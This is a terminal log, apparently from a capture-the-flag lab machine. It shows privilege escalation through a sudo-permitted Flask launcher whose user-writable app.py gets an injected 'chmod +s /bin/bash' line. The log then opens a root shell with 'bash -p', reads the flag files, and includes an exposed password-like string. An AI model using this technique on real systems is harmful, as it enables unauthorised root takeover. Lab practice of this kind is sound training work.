Matching Defaults entries for jack on bitforge: j4cKF0rg3@445
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, !env_reset

User jack may run the following commands on bitforge:
    (root) NOPASSWD: /usr/bin/flask_password_changer

jack@BitForge:~$ file /usr/bin/flask_password_changer
/usr/bin/flask_password_changer: Bourne-Again shell script, ASCII text executable

jack@BitForge:~$ cat /usr/bin/flask_password_changer
#!/bin/bash
cd /opt/password_change_app
/usr/local/bin/flask run --host 127.0.0.1 --port 9000 --no-debug

jack@BitForge:~$ cd /opt/password_change_app/
jack@BitForge:/opt/password_change_app$ ls -la
total 16
drwxr-xr-x 3 jack jack 4096 Jan 16  2025 .
drwxr-xr-x 4 root root 4096 Jan 16  2025 ..
-rw-r--r-- 1 jack jack  134 Jan 16  2025 app.py
drwxr-xr-x 2 jack jack 4096 Jan 16  2025 templates
jack@BitForge:/opt/password_change_app$ cat app.py
from flask import Flask, render_template

app = Flask(__name__)

@app.route("/")
def home():
    return render_template("index.html")

jack@BitForge:/opt/password_change_app$ cat app.py 
from flask import Flask, render_template
import os

os.system("chmod +s /bin/bash")

app = Flask(__name__)

@app.route("/")
def home():
    return render_template("index.html")

^Cjack@BitForge:/opt/password_change_app$ ls -la /bin/bash
-rwxr-xr-x 1 root root 1446024 Mar 31  2024 /bin/bash

jack@BitForge:/opt/password_change_app$ sudo /usr/bin/flask_password_changer
 * Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on http://127.0.0.1:9000
Press CTRL+C to quit
^C

jack@BitForge:/opt/password_change_app$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1446024 Mar 31  2024 /bin/bash
jack@BitForge:/opt/password_change_app$ /bin/bash -p
bash-5.2#

bash-5.2# cd /root
bash-5.2# ls -la
total 32
drwx------  5 root root 4096 Nov 15 17:01 . 
drwxr-xr-x 23 root root 4096 Nov  7  2024 ..
lrwxrwxrwx  1 root root    9 Jan 16  2025 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Apr 22  2024 .bashrc
drwx------  2 root root 4096 Jan 16  2025 .cache
drwxr-xr-x  3 root root 4096 Jan 15  2025 .local
-rw-r--r--  1 root root  161 Apr 22  2024 .profile
-rw-------  1 root root   33 Nov 15 17:01 proof.txt
drwx------  2 root root 4096 Nov  7  2024 .ssh
bash-5.2# cat proof.txt 
25ab403104a7d54e35b7d6ef63034631
bash-5.2# cat /home/jack/local.txt
3d13e87d079bb02cc1d586b7072f9a51